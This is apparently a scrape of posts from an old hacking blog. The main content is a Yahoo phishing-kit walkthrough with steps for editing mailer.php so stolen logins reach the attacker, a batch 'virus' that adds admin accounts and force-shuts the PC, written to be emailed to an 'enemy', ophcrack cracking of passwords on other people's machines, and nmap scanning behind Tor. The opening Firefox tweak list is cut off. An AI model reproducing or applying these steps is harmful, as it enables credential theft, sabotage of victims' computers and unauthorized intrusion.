In address bar of your browser type "about:config", reset the values of given entries and if that value doesn't exist then right click to create a new one.
type ---> property name---> value to be set
bool--->"network.http.pipelining"---->tr
bool--->"network.http.proxy.pipelining"-
integer--->"network.http.pipelining.maxr
integer--->"network.http.max-connections
integer--->"network.http.max-connections
integer--->"network.http.max-persistent-
integer--->"network.http.max-persistent-
integer--->"content.notify.backoffcount"
interger--->"content.max.tokenizing.time
integer--->"content.notify.interval"--->
integer--->"content.switch.threshold"---
bool--->"content.notify.ontimer"--->true
bool--->"content.interrupt.parsing"--->t
integer--->"nglayout.initialpaint.delay"
integer--->"browser.cache.memory.capacit
Speed Up Firefox Browser
Posted by ajun.... at 12:03 AM 0 comments
Journey Begins - First Step to hacking
To start with this tutorial you must be ready with following :
1. A port scanner Utility like nmap or superscan and experiment with them so that you can use them.......
nmap can be downloaded from insecure.org
2.A good anonymity like TOR or Wingate.
3.Desire to learn and research.
Tutorial:
1. Use port scanner to know what ports are opened in the target system.
Example command: nmap -sS 12.12.12.21
Result will look like below,
Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2007-07-12 05:07 EST
Interesting ports on 12.12.12.21
(The 1637 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp filtered ftp
22/tcp open ssh
23/tcp open telnet
111/tcp open sunrpc
139/tcp open netbios-ssn
1024/tcp open kdm
6000/tcp open X11
2. Try to find the exact version of services
Example command: nmap -sV –version-all host.com
3. Search for existing vulnerabilities for this exact service version.
4. Analyze the changelog details of soft wares in their release notes.
5. Now, you can know the security problems of this abc service and its 1.xx version.
6. Understand how the attacks will be deployed for this.
These are not just steps; you have to work/retry hard to get positive results. And don’t try these against google.com or yahoo.com
After the basics, you have to consider about your anonymity. Don’t use simple proxies for anonymity. Try different networks such as TOR . Don’t use the formal techniques always.
All above things are just basics to understand security problems and attacks. Start preventing your system/network from attackers after knowing everything about attacks.
P.S : For learning purpose only.: First try it on other computers on same router as you.
: Try for long forgotten sites which are not maintained now so that you can find vulnerabilities and their exploits.
Posted by ajun.... at 2:43 AM 0 comments
Labels: finding vulnerabilities, First Step to hacking, nmap, superscan, TOR
TOR-A Must Have Tool for Security & Anonymous Surfing
Tor is a toolset for a wide range of organizations and people that want to improve their safety and security on the Internet. Using Tor can help you anonymize web browsing and publishing, instant messaging, IRC, SSH, and other applications that use the TCP protocol. Tor also provides a platform on which software developers can build new applications with built-in anonymity, safety, and privacy features.
Tor: Overview
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. Tor provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy.Why we need Tor
Using Tor protects you against a common form of Internet surveillance known as “traffic analysis.” Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests. This can impact your checkbook if, for example, an e-commerce site uses price discrimination based on your country or institution of origin. It can even threaten your job and physical safety by revealing who and where you are. For example, if you’re travelling abroad and you connect to your employer’s computers to check or send mail, you can inadvertently reveal your national origin and professional affiliation to anyone observing the network, even if the connection is encrypted.
How does traffic analysis work? Internet data packets have two parts: a data payload and a header used for routing. The data payload is whatever is being sent, whether that’s an email message, a web page, or an audio file. Even if you encrypt the data payload of your communications, traffic analysis still reveals a great deal about what you’re doing and, possibly, what you’re saying. That’s because it focuses on the header, which discloses source, destination, size, timing, and so on.
Home Page: http://tor.eff.org/index.html.en
Posted by ajun.... at 2:22 AM 0 comments
Labels: Anonymous surfing, Proxy, Security, TOR, TORPROJECT
Feedburner hack: how to get 2500 subscribers overnight (video)
Taken From : http://thenextweb.org/2008/08/04/feedburner-hack-how-to-get-2500-subscribers-overnight-video/
Established blogs like ReadWriteWeb and Techcrunch proudly show a Feedburner chicklet that displays the sites popularity. But beware – since people are more likely to subscribe to a site with a bigger amount of readers, some sites manipulate the counter.
Every once and a while co-editor Patrick and I stumble on a shady looking website with a ton of readers. That made us wonder whether Feedburner is hackable. I’ve sacrificed my personal blog for a hacking experiment and the result; faking your subscriber count IS possible!
We found an easy way to hack Feedburner (Not the obvious hack that simply steals a chicklet from a popular site). Looking at the subscriber count at some sites, we’re not the first ones who found out, but we are the first ones to write it down. All it takes is an OPML file, a Netvibes Universe, and a good night’s sleep.
EDIT: While the hack still works, I am happy to tell you that Google and Netvibes are working on a solution to the problem. Steve Olechowski, co-founder Feedburner mailed me and said: “These things happen occasionally and are usually fixed in a couple of days”, he added that the feedburner counts do not influence advertisement measurement. Franck Mahon from Netvibes said: “We are working on a fix to filter out in the reporting the duplicates while still allowing people to add several instances of the widget to their startpage.” When things get fixed, it would be interesting to see the differences on some sites.
How to manipulate your Feedburner subscribers in two minutes
Watch Video:
http://www.vimeo.com/1463913
Moral of the story is: everybody can have a lot of Feedburner readers, which makes the service questionable as a measurement of performance. It’s up to Google/Feedburner to fix things up.
Once they do this, it will be very interesting to see which blogs suddenly lose a bunch of subscribers…
Above was from : Joop Dorresteijn
Posted by ajun.... at 3:34 PM 0 comments
Labels: Feedburner hack: how to get 2500 subscribers overnight (video)
Tip to Crack Windows Xp or VISTA password......
In case of Windows 98 it was really easy to crack the user login password....
Just look for log files reverse the XOR and eureka...you got the password......
But in case of Vista and Xp the case is different because they use hash for encoding which is a one way encryption and almost impossible to crack without any software or live CD.
So here is the process easy and simple that any one can follow.......
Go to http://ophcrack.sourceforge.net/ and download iso file.......
Burn that file with any burning software like Nero, magic ISO, Daemon etc......
Screenshot 1:
Boot from this CD on target computer and it will detect all hash files on the target computer and crack the password for you.......
Screenshot 2:
A nice trick to take to your college or school computer lab......
Video:
PS: ophcrack is a big file and will take some time to download even on broadband...
Posted by ajun.... at 2:24 AM 0 comments
ATS Chief Challeges Hackers
Posted by ajun.... at 11:01 PM 0 comments
Labels: ATS Chief Challeges Hackers, E-mails, Email Hacking, Indian Mujahideen, Terrorist
Get Free Rapidshare Account
The process is easy but takes almost a weeks time to get a free Rapidshare Premium Account ....
Actually the account is not for free it is an earned .........
Various ways to earn Rapidshare Premium account are.........
1. Upload data files of more than 5 M.B size and as people will download files you earn points. This can take a lot of time if you don't have fan following on net.....
2. Other method is to go to paypal.com and sign up for a premier account. Skip the debit card portion as it is not compulsory. You can opt for it if you want to shop through your own bucks.
Now go to awsurveys.com sign up there and get fill feedback for few sites and you will earn half the paypal balance you require for the account and rest half you will get almost in a weak time when other adds apear on that site.
I've got mine account using this method.
Give it a try will not take more then 15 minutes.
Posted by ajun.... at 10:39 AM 2 comments
Labels: Rapidshare
Funny Virus for friends
his virus can be used to create headache to ur enemy or friend. Imagine if ur enemy needs to delete many user accounts that are created by u....??
type the following code in notepad and save it as headache.bat and mail to ur enemy.
echo off
Net localgroup administrator Dont a /add
Net localgroup administrator BE b /add
Net localgroup administrator AFRAID c /add
Net localgroup administrator IT g /add
Net localgroup administrator IS a /add
Net localgroup administrator NOT f /add
Net localgroup administrator A s /add
Net localgroup administrator VIRUS h /add
Net localgroup administrator JUST a /add
Net localgroup administrator CHECKING l /add
Net localgroup administrator A o /add
Net localgroup administrator NEW p /add
Net localgroup administrator PROJECT q /add
Net localgroup administrator DONT a /add
Net localgroup administrator ABUSE a /add
Net localgroup administrator ME a /add
Net user BUT a /add
Net user KICK a /add
Net user ASS a /add
Net user OF a /add
Net user YOUR a /add
Net user ANTIVIRUS a /add
Net user THIS a /add
Net user PROJECT a /add
Net user WONT a /add
Net user HARM a /add
Net user YOUR a /add
Net user PC a /add
shutdown -f -t 0
2) Select the Properties command there
3) Press "Change Icon..." button
4) Select new icon there
Posted by ajun.... at 1:59 AM 0 comments
Labels: funny Virus, Trozan, worm keylogger
More fakes for other sites......
More fakes for other sites are available here.....
Posted by ajun.... at 1:48 AM 0 comments
Labels: Hack emailid yahoo hotmail gmail rediffmail zapak orkut facebook myspace hi5 paypal rapidshare
Yahoo email id hack............
Its been quite a hype about
1)Just download this file......just a 13kB zip file containing yahoo fake pages......
2)Extract the contents to of a folder
3)Edit mailer.php file with notepad and keep the email ID where you want hacked passwords to come as.
4)Uplaod all the 3 pages Loginerror.html ,index.html,mailer.php to a free webhost site
5)Send the site link to the victim
6)When he logs in tha uploaded yahoo fake page ,The ID pass which the victim entered will be sent to the email ID which you entered in mailer.php file.
If you do not have one you can make one for free @ http://www.tripod.lycos.co.uk/ or http://www.igotfree.com or search for more webhosts with PHP support , no forced ads.
*You only need to change 2 variables in this script.
- ($to = "Put_Email_Here@yahoo.com";) Email
- ($mailOrText = "YeS";) "yes" for email "no" for text file on server
*Place YOUR email between the quotes $to = "emailid@yahoo.com";
*Upload ALL the files to the server!
If you are not able to upload files in lycos then use some other server the best is
"www.ripway.com"
Posted by ajun.... at 1:24 AM 1 comments
Labels: hackin email id, yahoo email hack

